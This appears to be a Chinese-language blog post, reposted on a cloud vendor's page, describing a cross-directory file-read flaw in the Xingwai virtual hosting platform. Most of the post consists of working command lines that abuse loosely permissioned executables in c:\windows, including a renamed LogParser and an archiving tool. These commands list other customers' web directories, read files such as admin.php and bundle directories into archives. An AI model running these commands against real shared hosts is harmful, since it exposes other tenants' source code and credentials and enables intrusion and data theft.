標籤:style blog http color os ar strong 檔案 2014
星外虛擬機器主機跨目錄讀取檔案漏洞,需要一定條件。
問題發生在以下檔案,這些檔案都沒有嚴格的設定執行許可權,當前的IIS使用者能夠順利的利用它們執行命令:
c:\windows\7i24IISLOG.exec:\windows\7i24IISLOG2.exec:\windows\7i24IISLOG3.exec:\windows\7i24IISLOG4.exec:\windows\7i24tool.exec:\windows\rsb.exe
這些檔案貌似是星外處理日誌、設定許可權的,其中的7i24IISLOG.exe其實就是LogParser,LogParser是一款強大日誌分析工具,下面利用它來列web目錄:
c:\windows\7i24IISLOG "select top 100 path from e:\host\*.*" -i:FS -rtp:-1
返回如下:
讀取其中一個站的目錄資訊:
c:\windows\7i24IISLOG "select top 100 path from e:\host\0233ab\*.*" -i:FS -rtp:-1
下面讀取檔案內容:
c:\windows\7i24IISLOG "select text from e:\host\0233ab\web\admin.php" -i:textline -rtp:-1
7i24IISLOG3.exe能夠打包ISO檔案,利用它同樣的也可以列出目錄檔案資訊:
c:\windows\7i24IISLOG3 e:\host\0233ab\web\ c:\windows\temp\123.rar
同樣的還有rbs.exe
c:\windows\rbs -r -v 024dbjj e:\host\0233ab\web\*.*
星外虛擬機器主機跨web目錄檔案讀取漏洞
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
